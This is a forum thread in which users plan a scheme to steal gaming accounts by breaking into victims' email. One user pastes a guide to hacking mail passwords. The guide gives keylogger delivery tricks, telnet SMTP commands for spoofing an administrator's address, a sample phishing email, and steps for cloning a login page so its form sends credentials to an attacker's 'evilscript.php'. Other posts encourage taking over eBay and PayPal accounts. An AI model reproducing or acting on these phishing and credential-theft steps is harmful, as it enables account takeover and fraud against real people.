Best scam so far UNTRACKABLE!

[Kevin]

Well first of all you need to know how to hack into this persons EMAIL>D
Well the first post was asking for their password, but ofc now they say that blizz wont need ya pass so that kinda failed. but now take OUT the password requirement. so then what you do is that you get their email. they also supply you with their account name so you type in their account name into the "forgotten password?" thingy and then get into their email, get the new password and delete it! It works if you know how to email hack, which, I don't know how to do so no programs Thats up to you here >D well if first person to tell people how to hack emails gets a rep point.
Also people won't know its Blizzy because they're not asking for their password! No suspicion here! <D Bester.
Tchank zoos!)DBwah!!

[Blarg]

You can use this scam for any thing that involves an account and a forgotten password option. The problem is getting into there email.

[Kevin]

Which is simply hacking INTO their email <D It's possible My friends done it. well more like my arch enemy, but Wotevr <D

[Range]

Wow someone teaches you how to hack into an email for a REP POINT?? No one would do / show you it for that! xD

[Tresspass]

you can't simply "hack" into an email account go to h4cky0u.org and get learning you can get into some stuff those ways

[KaMiKaZe]

its not really a scam

[Tresspass]

even if you did hack there email then you still have to fool them with a domain like @hotmail.com, thats not gonna fool me...

[KaMiKaZe]

alot of people are stupid and overlook things like that

[Volund]

good job man... and tresspass, good link you can use this to hack E-bay accounts too.... along w/ paypal if u know some of the persons personal info .... but u didnt hear that from me... if u do that its not my fault when the ebay cops rape ur ass

[Tresspass]

Hacking mail passwords
Author: xp10i3r

Disclaimer
----------
First of all English is not my first language hence sorry for any typos. This material is for educational purpose only, be clever and don't act stupid...
Here are the most common ways someone can hack mail passwords, and how to protect yourself against them. There are more ways, and even these techniques
could be more documented but this file is not intended to be a step-by-step lamer spoonfeeding device. You only get the ideea, the rest is up to you.
If you don't, that means you're too iresponsible in the first place. Ouch!
Hope you enjoy reading this... So lets get started:

Guessing
--------
Duh! The easiest method of hacking mail passwords is password guessing. Find out all information about the victim.
For example if the victim is interested in aquarium then his password might be something like fish, whale, dolphin, aquariam. etc.
A lot of people keep there passwords their the girlfriend's name or boyfriend's name.
You can also try "forget password", available on all mail providers. Try to guess answer to the secret question the victim gave.
For example if the question is "my mother's maiden name", "my first school name", "my pet's name", etc. its quite easy to get the answer of it.
Note that a clever user doesn't actually set the answer to have anything to do with the question, do you? :>

Dictionary Attack
-----------------
A dictionary attack means you use a program that tries to connect to the mailserver using a username (your victim's), and as password,
all the words from a long filelist. If the password is a common word (eg. cat, john, sex, password, etc) and you have a big enaugh list than you might get lucky.

Brute force
-----------
Brute force works in a way like the dictionary attack, the difference is that the program you use doesn't read the passwords from a list,
but it generates them itself. Lets say you want to break a 5 digit password.
The combinations would look like this aaaaa, aaaab, aaaac, ... aaaba, aaabb, aaabc, ... , zzzzz, if you use only lowercase alphabet digits, no numbers.
The thing is that most mailservers allow you to use lowercase, uppercase, numbers and sybols, some even require a minimmum length for the password
(eg. Yahoo! length is 6 digits). A password that look like "gJe4Ty&8lk!3" is practicly unbreakable considering the time needed to try all the combinations possible.
You do the math. Brute force is theoreticly the method that CAN get the password of the victim but it's almost IMPOSSIBLE to use in practice do to the time needed.
It all depends on the length of the password. Also, many servers may ignore you after you have to much failed logins.

Using a Keylogger
-----------------
Just install a keylogger on your victim's computer. Send it by mail or IRC and tell the victim it's a cool mp3player, whatever...
There are keyloggers that only need to be cliked once and they do all the installing job by themself without the victim even notice it.
What a keylogger does is it will log all the keystrokes the victim types on that machine.
It works in background so the victim will not realize that his keystrokes are being logged.
And if all keystrokes are recorded it means even his login and password are also included when he logins to read his mail.
Then just connect to the keylogger or set it to automaticly send you the logfile by email.

Social engeniering
------------------
This is one of the best methods, and unless the one you want to get the password from is realy smart, you have all the chances to trick him.
What you will do over here is send mail to the victim from administrator@hismailserver.com so that the victim will think he received mail from his administrator!
Newbie note: For the people who are new to SMTP, it is the Simple Mail Transfer Protocol and it runs by default at port 25.
To get some SMTP servers use google to search "free smtp" or download a free smtp server to be able to telnet to your own computer on port 25.
Personaly I use Linux wich comes by default with sendmail, and since now it worked everytime. I also played a prank on a friend tricking him
to think he was wanted by the FBI. Ok just type the following commands, without the "" of course:

"telnet mail.mailserver.com 25" or "telnet mailserver.com 25"
"HELO victimsmailserver.com"
"MAIL FROM: administrator@victimsmailserver.com
"RCPT TO: victim@victimsmailserver.com"
"DATA"

Here you can write the message you want to send to victim.
After the message is over press [Enter] and on the new line put a ".", and press [Enter] again to indicate the server that your message is over.
The mail might look like this:

Form: administrator@victimsmailserver.com

Hello user of victimsmailserver.com. We deeply apologise for the inconvenience, but our server will go down for technical problems.
We have to announce you that you have to change your password in order to keep your account.
victimsmailserver.com keeps this information private and we assure you your data will suffer no harm.

IMPORTANT NOTE: Change your password to "revalidate_account" as soon as possible or your account will be DISACTIVATED!
You will receive a confirmation e-mail from our server to notify you that your request has been taken care of, once you've made the neccesary changes.

Once again we apologise for the inconvenience and thank you for your understanding.
victimsmailserver.com administrator.

Now this was just an exaple. Be creative. You can tell the victim to send his username and password by email to you
(get a fake mail like administartor@victimsmailserver.com, note "administartor" not "administrator").
Once again you will be amased how many peolpe will get tricked even if most mailservers spcificly tell you something like:
"MAILSERVER staff will NEVER ask for your password"...
Now the way experts use, is to include a link in the mail you've sent him to a webpage you've already made that looks like the victimsmailserver.com's homepage.
Just write on that page something like "lost VICTIM'S NAME account data" so the victim thinks he has to send all his data again
Once he writes to the form on that page and presses "Submit" the page will actualy send you mail with all his data, including password.
With a little knowledge of HTML and PHP you can trick even the smartest people.

More social engeniering
-----------------------
Open your victim's mail website and login over there with wrong password! You will be directed to a page with "invalid login" message.
Just modify that page and add the line "Operation time out" by editing its source code.
Also you will have to find the line <form method=post action ="something"> and change it to <form method=post action=http://www.yourwebhost.com/evilscript.php>.
Now put the webpage on a your webhost, name it timeout.html.
Make a php page which uses the mail() command to send you the username and password of the victim and name it evilscript.php.
Send the victim a mail with the following link: <a href="http://www.yourwebhost.com/timeout.html">Picture.jpg</a>.
Or use some javascript relocation code, like "window.redirect" but this depend on the victim's mailserver and it might now work
(Yahoo! can't be tricked with relocation anymore as far as I know) so personaly I would use the link technique...
If you have knowledge of html and php then you will understand this one.

Bugs and exploits
-----------------
The best of the best use bugs in software (eg. Internet Explorer) or in the actual daemons running on the victim's mailserver.
Techniques such as "cookie collecting", "cross site scripting", "SQL injection" etc. I'm trying to figure them out myself :>
Anyone willing to help? In the future I might write an article on these techniques, as soon as I'll be able to learn them...

Conclusion
----------
Mail passwords can only be hacked if the victim is not much conscious about security.
Use the following security measures to protect yourself from your mail password being hacked.

- Keep your passwords long enough, containing numbers and special characters. Avoid keeping simple words or names as your passwords.
- Don't access your mails from a public place (keylogging danger). If possible always access your mail account from your home.
- Don't run suspicious software on your computer, it may be a keyloger, trojan or something like that.
- Always look at attachments with a suspicious eye though it may be from a trustworthy person.
- Use the "full headder" option of your mailserver to see if the email actually comes wrom where it says it does.
_________________